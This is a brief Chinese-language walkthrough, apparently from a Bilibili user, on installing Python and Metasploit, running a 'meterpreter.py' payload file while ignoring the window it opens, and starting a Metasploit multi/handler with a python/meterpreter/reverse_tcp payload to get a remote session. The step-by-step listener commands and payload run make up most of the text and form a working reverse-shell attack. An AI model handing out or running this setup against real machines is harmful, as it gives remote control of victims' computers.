首先，先安装python，双击“python-3.8.0-amd64.exe”，安装教程可以看http://c.biancheng.net/view/4161.html
然后安装黑客工具，看https://www.fujieace.com/metasploit/windows.html
然后双击"meterpreter.py"（会弹出一个黑色的窗口，不用管）
安装好黑客工具后可以这样：
按下win键和r键，输入cmd，点击回车
然后在一个黑色的窗口里输入msfconsole，点击回车，
然后会过几秒，过一会你如果看到最下面写了一个“msf > ”让你输入命令的话，输入下面的命令：（注：每个换行就按下回车）
----------------------------------------------------
use exploit/multi/handler
set lhost 192.168.174.1
set lport 4444
set payload python/meterpreter/reverse_tcp
run -j
(按一下回车)
sessions -i 1
----------------------------------------------------
如果你能看到一个"meterpreter >"就说明你入侵成功了，防御失败。

bilibili CarryWS